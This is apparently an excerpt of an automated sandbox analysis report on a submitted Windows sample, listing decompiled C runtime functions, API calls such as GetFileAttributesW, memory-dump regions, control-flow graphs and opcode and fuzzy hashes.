                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h$Warning: implicit LoadString(%u) failed
                      • API String ID: 1089072215-3286162589
                      • Opcode ID: 92108192ffd056bae545b59d2827d201d6f8a518659734a7ccc5ef18e0e4a6a7
                      • Instruction ID: 5b829f85cfd33dac1d1562d52860f3546ce631a5ebb07d2eb7d27ee8d4a8d97b
                      • Opcode Fuzzy Hash: 92108192ffd056bae545b59d2827d201d6f8a518659734a7ccc5ef18e0e4a6a7
                      • Instruction Fuzzy Hash: 991152B0D04249AFDB44DFACD852FAEBBF4AF44340F4080B9F909EB281E6759A04CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00957560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 49%
                      			E00957560(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t9;
				void* _t19;

				if( *0xb3027c == 0) {
					__eflags = _a4 - 0xffffffff;
					if(__eflags == 0) {
						_t9 = L00994930(__eflags, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcstartup\\src\\misc\\thread_safe_statics.cpp", 0xa6, 0, "%ls", 0);
						__eflags = _t9 - 1;
						if(_t9 == 1) {
							asm("int3");
						}
					}
					E00957550(_t9);
					_t19 =  *0xb30260; // 0x0
					return E009574F0(WaitForSingleObjectEx(_t19, _a4, 0));
				}
				_v12 =  *0xb3027c;
				_v8 = _v12;
				 *0x9d62b0(0xb3025c, 0xb30264, _a4);
				return _v8();
			}







                      0x0095756d
                      0x00957599
                      0x0095759d
                      0x009575b4
                      0x009575bc
                      0x009575bf
                      0x009575c1
                      0x009575c1
                      0x009575bf
                      0x009575c2
                      0x009575cd
                      0x00000000
                      0x009575da
                      0x00957574
                      0x00957588
                      0x0095758e
                      0x00000000

                      APIs
                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 009575D4
                      Strings
                      • %ls, xrefs: 009575A1
                      • d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp, xrefs: 009575AD
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ObjectSingleWait
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp
                      • API String ID: 24740636-368162206
                      • Opcode ID: 1c607698f501c956b5841168e2d70a796bde6cc7cecfeecce0ead0b288f20976
                      • Instruction ID: 517fcc7c97b1d8869d9c808050a184ffe89a717ac9699d9f459c9123322e6e31
                      • Opcode Fuzzy Hash: 1c607698f501c956b5841168e2d70a796bde6cc7cecfeecce0ead0b288f20976
                      • Instruction Fuzzy Hash: 1D01F730658308BBCB10EFA4EC4AF6EB734AB84701F204249F904571D1EA705F45CB84
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095B220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0095B220(intOrPtr* _a4, signed char _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				void* _t28;
				void* _t36;
				void* _t37;

				if((_a8 & 0x000000ff) != 0) {
					_v8 =  *_a4;
					if( *_v8 == 0xe06d7363) {
						_t30 = _v8;
						if( *((intOrPtr*)(_v8 + 0x10)) == 3) {
							if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_v8 + 0x14)) == 0x19930521) {
								L6:
								 *((intOrPtr*)(E0095C670(_t28, _t30, _t36, _t37) + 0x10)) = _v8;
								_v12 =  *((intOrPtr*)(_a4 + 4));
								 *((intOrPtr*)(E0095C670(_t28,  *((intOrPtr*)(_a4 + 4)), _t36, _t37) + 0x14)) = _v12;
								E00999BF0( *((intOrPtr*)(_a4 + 4)));
							} else {
								_t30 = _v8;
								if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930522) {
									goto L6;
								}
							}
						}
					}
				}
				return 0;
			}








                      0x0095b22c
                      0x0095b233
                      0x0095b23f
                      0x0095b241
                      0x0095b248
                      0x0095b254
                      0x0095b26e
                      0x0095b276
                      0x0095b27f
                      0x0095b28a
                      0x0095b28d
                      0x0095b262
                      0x0095b262
                      0x0095b26c
                      0x00000000
                      0x00000000
                      0x0095b26c
                      0x0095b254
                      0x0095b248
                      0x0095b23f
                      0x0095b297

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B26E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B282
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 6dd80d50e2317335380e3f374e4c7701a862c5bdbb6d16d56a54317923efd760
                      • Instruction ID: c43343b43087e6fe2a3b5999b8606e950e0c390e79d359af198f15bff73603cb
                      • Opcode Fuzzy Hash: 6dd80d50e2317335380e3f374e4c7701a862c5bdbb6d16d56a54317923efd760
                      • Instruction Fuzzy Hash: 10010C34901208DF8B18DFA6D14186DBBBABF55302F608598DC585B325D731DF45DBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00942500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00942500(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t10;
				void* _t24;
				void* _t25;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_t10 = E0094F1D0(0xb33740);
				E009423E0(__ebx, __edi, __esi, __eflags, E009423B0( &_v12, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlexcept.h", 0x42), _t10, 0, "AtlThrow: hr = 0x%x\n", _a4);
				E009424E0( &_v16, _a4);
				return E009D1520(E0095BE10( &_v16, 0xa04690), _t24 - _t25 + 0x20);
			}









                      0x00942506
                      0x0094250d
                      0x00942514
                      0x0094252b
                      0x00942541
                      0x00942550
                      0x00942570

                      APIs
                      • _Smanip.LIBCPMTD ref: 0094253B
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                        • Part of subcall function 0095BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 0095BEAA
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h, xrefs: 00942533
                      • AtlThrow: hr = 0x%x, xrefs: 0094251F
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckExceptionRaiseSmanipStackVars@8
                      • String ID: AtlThrow: hr = 0x%x$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h
                      • API String ID: 1594162562-3884214373
                      • Opcode ID: d270a8c8c2c4242eece999d6ba2dcc130ddc9979618017c51ddd43ebe4858b68
                      • Instruction ID: d8b2141f541d0a35daf58e638b8bbb078ea6847681feebfc6b47ef6550d550ae
                      • Opcode Fuzzy Hash: d270a8c8c2c4242eece999d6ba2dcc130ddc9979618017c51ddd43ebe4858b68
                      • Instruction Fuzzy Hash: 52F05BB6E4420C7BD700FF99DC43FAD7738AB90740F408554BA052B692E6756A148795
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00956B65 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 68%
                      			E00956B65(void* __ecx) {
				void* __edi;
				long _t7;
				void* _t13;
				intOrPtr* _t19;
				void* _t21;

				_t13 = __ecx;
				_t21 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t21 != 0) {
					_t19 = E0095676A(_t13, 0xb3020c);
					 *_t21 = 0 | _t19 == 0x00000000;
					if(_t19 == 0) {
						_t7 = E009569E3(_t19);
					} else {
						 *0x9d62b0();
						_t7 =  *_t19();
					}
					 *(_t21 + 4) = _t7;
					if(_t7 != 0) {
						return _t21;
					} else {
						HeapFree(GetProcessHeap(), _t7, _t21);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}








                      0x00956b65
                      0x00956b77
                      0x00956b7b
                      0x00956b8f
                      0x00956b96
                      0x00956b9a
                      0x00956ba8
                      0x00956b9c
                      0x00956b9e
                      0x00956ba4
                      0x00956ba4
                      0x00956bad
                      0x00956bb3
                      0x00956bc9
                      0x00956bb5
                      0x00956bbe
                      0x00000000
                      0x00956bbe
                      0x00956b7d
                      0x00956b7d
                      0x00956b80
                      0x00956b80

                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000008,?,00944CBB), ref: 00956B6A
                      • HeapAlloc.KERNEL32(00000000,?,00944CBB), ref: 00956B71
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00944CBB), ref: 00956BB7
                      • HeapFree.KERNEL32(00000000,?,00944CBB), ref: 00956BBE
                        • Part of subcall function 009569E3: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A07
                        • Part of subcall function 009569E3: HeapAlloc.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956A0E
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$Process$Alloc$Free
                      • String ID:
                      • API String ID: 1864747095-0
                      • Opcode ID: 61a9915e5a4424de6451ebd0dcfc38f793f7790368273b8e61dffc2959ef38a4
                      • Instruction ID: edc962ef41846c5161ce00cfb7577464a4d2d273c2ed5f553a1d5a3054372ea7
                      • Opcode Fuzzy Hash: 61a9915e5a4424de6451ebd0dcfc38f793f7790368273b8e61dffc2959ef38a4
                      • Instruction Fuzzy Hash: A3F0593269D71247C720ABBABC0DA1B3B68AFC0B927210019F842C3150DE30C8449750
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:30
                      Total number of Limit Nodes:2
                      execution_graph 27661 42b2188 27662 42b219a 27661->27662 27665 42b4268 27662->27665 27663 42b21c9 27666 42b4282 27665->27666 27667 42b42a7 27666->27667 27670 42b4321 27666->27670 27674 42b4330 27666->27674 27667->27663 27671 42b4343 27670->27671 27678 42b4398 27671->27678 27675 42b4343 27674->27675 27677 42b4398 GetFileAttributesW 27675->27677 27676 42b4361 27676->27667 27677->27676 27680 42b43bd 27678->27680 27679 42b4361 27679->27667 27680->27679 27681 42b4482 27680->27681 27684 42b65c0 27680->27684 27681->27679 27682 42b65c0 GetFileAttributesW 27681->27682 27682->27679 27688 42b6740 27684->27688 27693 42b6750 27684->27693 27685 42b65ea 27685->27681 27690 42b6768 27688->27690 27689 42b677d 27689->27685 27690->27689 27698 42b5c24 27690->27698 27694 42b6768 27693->27694 27695 42b677d 27694->27695 27696 42b5c24 GetFileAttributesW 27694->27696 27695->27685 27697 42b67ae 27696->27697 27697->27685 27699 42b6e80 GetFileAttributesW 27698->27699 27701 42b67ae 27699->27701 27701->27685

                      Executed Functions

                      Function 0072B5AA Relevance: .6, Instructions: 568COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1135 72b5aa-72b5c9 1136 72ba00 1135->1136 1137 72b5cf-72b5db 1135->1137 1142 72ba0a-72ba11 1136->1142 1138 72b5e1-72b5e8 1137->1138 1139 72bae5-72baef 1137->1139 1140 72b847-72b84b 1138->1140 1141 72b5ee-72b609 1138->1141 1146 72baf1-72bb03 1139->1146 1147 72bb65-72bb6e 1139->1147 1144 72b8b9-72b8bf 1140->1144 1145 72b84d-72b85b 1140->1145 1141->1140 1154 72b60f-72b617 1141->1154 1161 72ba16-72ba1d 1142->1161 1148 72b984-72b987 1144->1148 1149 72b8c5-72b8d6 1144->1149 1158 72ba71-72ba7f 1145->1158 1159 72b861-72b889 1145->1159 1146->1147 1162 72bb05-72bb60 1146->1162 1163 72bb70-72bb80 1147->1163 1164 72bbd5-72bbf3 1147->1164 1152 72bdd9-72bde0 1148->1152 1165 72bc3e-72bc4d 1149->1165 1166 72b8dc-72b8f1 1149->1166 1154->1142 1160 72b61d-72b624 1154->1160 1158->1144 1175 72ba85-72baa1 1158->1175 1205 72b897-72b8ae 1159->1205 1206 72b88b-72b88e 1159->1206 1167 72b777-72b7c1 1160->1167 1168 72b62a-72b63f 1160->1168 1182 72ba22-72ba29 1161->1182 1162->1152 1201 72bb82-72bba1 1163->1201 1202 72bba9-72bbcd 1163->1202 1197 72bbf5-72bc04 1164->1197 1198 72bc1a-72bc36 1164->1198 1183 72bcc6-72bcd5 1165->1183 1184 72bc4f-72bc5e 1165->1184 1192 72b8f3-72b902 1166->1192 1232 72b7c7-72b7d4 1167->1232 1233 72ba54-72ba5b 1167->1233 1168->1167 1181 72b645-72b64d 1168->1181 1175->1144 1200 72baa7-72bae0 1175->1200 1181->1161 1187 72b653-72b65a 1181->1187 1218 72ba2e-72ba35 1182->1218 1211 72bcf3-72bd02 1183->1211 1212 72bcd7-72bcee 1183->1212 1184->1183 1207 72bc60-72bcc1 1184->1207 1194 72b677-72b681 1187->1194 1195 72b65c-72b664 1187->1195 1226 72b904-72b913 1192->1226 1227 72b92a-72b979 1192->1227 1194->1167 1209 72b687-72b68f 1194->1209 1195->1182 1208 72b66a-72b671 1195->1208 1197->1198 1230 72bc06-72bc11 1197->1230 1198->1165 1200->1144 1201->1202 1202->1164 1306 72b8b0 call 72be60 1205->1306 1307 72b8b0 call 72be5b 1205->1307 1308 72b8b0 call 72bde8 1205->1308 1206->1205 1207->1192 1208->1167 1208->1194 1209->1218 1219 72b695-72b69c 1209->1219 1211->1192 1234 72bd08-72bd1f 1211->1234 1212->1192 1254 72ba3a-72ba4f call 721f58 1218->1254 1228 72b69e-72b6ad 1219->1228 1229 72b6cf-72b6de 1219->1229 1224 72b8b6 1224->1144 1226->1227 1253 72b915-72b924 1226->1253 1289 72b97b 1227->1289 1228->1229 1255 72b6af-72b6c9 1228->1255 1248 72b6e0-72b6ef 1229->1248 1249 72b70d-72b71c 1229->1249 1230->1198 1256 72bc13-72bc16 1230->1256 1232->1254 1259 72b7da-72b831 1232->1259 1238 72ba61-72ba6c call 721f58 1233->1238 1239 72b83a-72b844 1233->1239 1234->1192 1238->1239 1239->1140 1248->1249 1269 72b6f1-72b70b 1248->1269 1249->1140 1271 72b722-72b731 1249->1271 1253->1227 1273 72bd24-72bd86 1253->1273 1254->1239 1255->1167 1255->1229 1256->1198 1259->1239 1269->1167 1269->1249 1271->1140 1283 72b737-72b751 1271->1283 1273->1289 1283->1140 1297 72b757-72b771 1283->1297 1289->1148 1297->1140 1297->1167 1306->1224 1307->1224 1308->1224
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c2d32c9f110d662ba3ca8f7562f749715451fede68205eeceb8b8fb4aead6cb
                      • Instruction ID: f6039e7f29f5e98024bcdd8095d1fa6e4cd271341e5df8c5469686fa9394d049
                      • Opcode Fuzzy Hash: 7c2d32c9f110d662ba3ca8f7562f749715451fede68205eeceb8b8fb4aead6cb
                      • Instruction Fuzzy Hash: C5226938B002189FDB08DBB5D994BAD77F6AF88304F158068E902DB795DB39ED49CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00726A48 Relevance: .5, Instructions: 546COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1309 726a48-726a68 1475 726a6b call 726a43 1309->1475 1476 726a6b call 726d6b 1309->1476 1477 726a6b call 726a48 1309->1477 1478 726a6b call 726dff 1309->1478 1310 726a71-726a8e 1312 726a94-726a9d 1310->1312 1313 726fb9-726fc0 1310->1313 1314 726aa3-726ac1 1312->1314 1315 72716c-72717e 1312->1315 1323 726ac3-726ad3 1314->1323 1324 726ad9-726ae8 1314->1324 1318 727180-727182 1315->1318 1319 727187-727189 1315->1319 1320 727184 1318->1320 1321 72718b-7271a2 1318->1321 1319->1321 1320->1319 1325 7271a7-7271b9 1321->1325 1323->1324 1328 726fa7-726fb3 1323->1328 1324->1328 1329 726aee-726afa 1324->1329 1331 7271bb-7271c7 1325->1331 1332 7271c9-72729c 1325->1332 1328->1312 1328->1313 1335 726b00-726b11 1329->1335 1336 726afc-726afe 1329->1336 1331->1332 1338 726b17-726b19 1335->1338 1336->1338 1339 726e03-726e0f 1338->1339 1340 726b1f-726b2a 1338->1340 1345 726e11-726e13 1339->1345 1346 726e15-726e26 1339->1346 1340->1339 1344 726b30-726b4a 1340->1344 1344->1328 1354 726b50-726b5d 1344->1354 1347 726e2c-726e2e 1345->1347 1346->1347 1347->1328 1348 726e34-726e3f 1347->1348 1348->1328 1353 726e45-726e5f 1348->1353 1353->1328 1362 726e65-726e6a 1353->1362 1357 726b6e 1354->1357 1358 726b5f-726b6c 1354->1358 1359 726b73-726b75 1357->1359 1358->1359 1359->1328 1361 726b7b-726b81 1359->1361 1363 726b83-726b94 1361->1363 1364 726b9a-726be8 1361->1364 1365 726e78 1362->1365 1366 726e6c-726e76 1362->1366 1363->1364 1371 726fc3-727002 1363->1371 1388 726c1a-726c3d 1364->1388 1389 726bea-726c13 1364->1389 1367 726e7d-726e7f 1365->1367 1366->1367 1367->1328 1370 726e85-726e8b 1367->1370 1372 726ea3-726ee1 1370->1372 1373 726e8d-726e9d 1370->1373 1393 727004-72700e 1371->1393 1394 727019-72708c 1371->1394 1400 726ee3-726ee6 1372->1400 1401 726eee-726ef4 1372->1401 1373->1372 1378 727093-7270d8 1373->1378 1402 7270da-7270e4 1378->1402 1403 7270ef-727165 1378->1403 1409 726c43-726c49 1388->1409 1410 726d7f-726da8 1388->1410 1389->1388 1393->1394 1394->1378 1400->1401 1405 726f26-726f61 1401->1405 1406 726ef6-726f1f 1401->1406 1402->1403 1403->1315 1405->1328 1433 726f63-726f9c 1405->1433 1406->1405 1412 726c7b-726cb8 1409->1412 1413 726c4b-726c74 1409->1413 1410->1328 1431 726dae-726df2 1410->1431 1449 726d44-726d5d 1412->1449 1450 726cbe-726d1d 1412->1450 1413->1412 1431->1328 1433->1328 1457 726d68-726d69 1449->1457 1458 726d5f 1449->1458 1471 726d2a-726d3e 1450->1471 1472 726d1f-726d22 1450->1472 1457->1410 1458->1457 1471->1449 1471->1450 1472->1471 1475->1310 1476->1310 1477->1310 1478->1310
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a3fb9142c20746824a3b91248813aab5156caa2a4127d1ce854accb831d832f
                      • Instruction ID: 8afd6ebc34bcec9a66eac71ce96d44dbd35574a5c252f79b6f94fcbc17f8d03b
                      • Opcode Fuzzy Hash: 2a3fb9142c20746824a3b91248813aab5156caa2a4127d1ce854accb831d832f
                      • Instruction Fuzzy Hash: 1D227B307042158FCB54DF68E894AAEB7F2EF88304F158929E506DB3A1DB74ED05CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0072C2D7 Relevance: .3, Instructions: 299COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a15d8245ad9d76a6f3630b9ba86678521a2371b3f255866c7fbc59ce3c5492f0
                      • Instruction ID: 77a449e8d41766d1ef7f35983b0c10cfccdcc9617d998bc5fd52e09d542d7431
                      • Opcode Fuzzy Hash: a15d8245ad9d76a6f3630b9ba86678521a2371b3f255866c7fbc59ce3c5492f0
                      • Instruction Fuzzy Hash: ABC19C71A007298FCB25CF65C84079EB7F2BF99304F2585A9D409AB351DB70AE89CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 042B6E78 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1009 42b6e78-42b6eca 1012 42b6ecc-42b6ecf 1009->1012 1013 42b6ed2-42b6efd GetFileAttributesW 1009->1013 1012->1013 1015 42b6eff-42b6f05 1013->1015 1016 42b6f06-42b6f23 1013->1016 1015->1016
                      APIs
                      • GetFileAttributesW.KERNELBASE(00000000), ref: 042B6EF0
                      Memory Dump Source
                      • Source File: 00000001.00000002.388104727.00000000042B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_42b0000_powershell.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 4e9f8d3d7c4686f1de0b7e8325514ac566c250a0a33bd3d34892f3a25a04944a
                      • Instruction ID: 4bbac4f9c1a032260dcf98d37f92850f81b3b4f13047c87dd06707c084c7342d
                      • Opcode Fuzzy Hash: 4e9f8d3d7c4686f1de0b7e8325514ac566c250a0a33bd3d34892f3a25a04944a
                      • Instruction Fuzzy Hash: B31136B1D0466A9BCB10CFAAD844BDEFBF4BB48314F14852AD819B7200C774A944CFE2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 042B5C24 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 999 42b5c24-42b6eca 1002 42b6ecc-42b6ecf 999->1002 1003 42b6ed2-42b6efd GetFileAttributesW 999->1003 1002->1003 1005 42b6eff-42b6f05 1003->1005 1006 42b6f06-42b6f23 1003->1006 1005->1006
                      APIs
                      • GetFileAttributesW.KERNELBASE(00000000), ref: 042B6EF0
                      Memory Dump Source
                      • Source File: 00000001.00000002.388104727.00000000042B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_42b0000_powershell.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 791a371ce3eeca4e9e3d8ca6a9b9769d68e4d20ec8b59435e3c666236a945915
                      • Instruction ID: 6ee2e639f37bdd14c7b651f63cdc9279ad119fa1cfc258a1894f43dbd5dbe5a8
                      • Opcode Fuzzy Hash: 791a371ce3eeca4e9e3d8ca6a9b9769d68e4d20ec8b59435e3c666236a945915
                      • Instruction Fuzzy Hash: 312124B1D146599BCB10CF9AD844B9EFBB4BB48314F04812AD819A7600D774A904CFE5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00728D28 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1019 728d28-728d50 1022 728d52-728d5c 1019->1022 1023 728d5e 1019->1023 1024 728d63-728d65 1022->1024 1023->1024 1025 728d96-728dc2 1024->1025 1026 728d67-728d88 1024->1026 1033 728dc4 1025->1033 1034 728dcb-728df4 1025->1034 1037 728d8f-728d93 1026->1037 1035 728dc6-728dc9 1033->1035 1036 728df9-728e04 1033->1036 1034->1036 1035->1034 1040 728e22-728e94 1036->1040 1041 728e06-728e21 1036->1041 1050 729084-7290b3 1040->1050 1051 728e9a-728ea6 1040->1051 1054 728eb1-728ecc 1051->1054 1055 728ea8-728eab 1051->1055 1061 728ef1-728f27 1054->1061 1062 728ece-728ed8 1054->1062 1055->1054 1057 728f44-728f46 1055->1057 1059 728f53-728f64 1057->1059 1060 728f48-728f51 1057->1060 1059->1051 1060->1059 1063 728f69-728f70 1060->1063 1061->1051 1085 728f2d-728f3f 1061->1085 1062->1061 1070 728eda-728eea 1062->1070 1066 728f76-728f8b 1063->1066 1067 729004-729016 1063->1067 1078 728fa3-729002 1066->1078 1079 728f8d-728f93 1066->1079 1076 729018-72901e 1067->1076 1077 72902e-729075 1067->1077 1070->1061 1081 729022-729024 1076->1081 1082 729020 1076->1082 1096 72907d 1077->1096 1078->1096 1083 728f97-728f99 1079->1083 1084 728f95 1079->1084 1081->1077 1082->1077 1083->1078 1084->1078 1085->1050 1096->1050
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: j
                      • API String ID: 0-2137352139
                      • Opcode ID: 0b5ccb24f21d544aa1b862cd0d1d46601a7da1f1ea64ebd5962f9034137c0161
                      • Instruction ID: fee1c65824ed2cc96f1173ae404f4a05eeb2e424c9b70b81978fd07b5a85994e
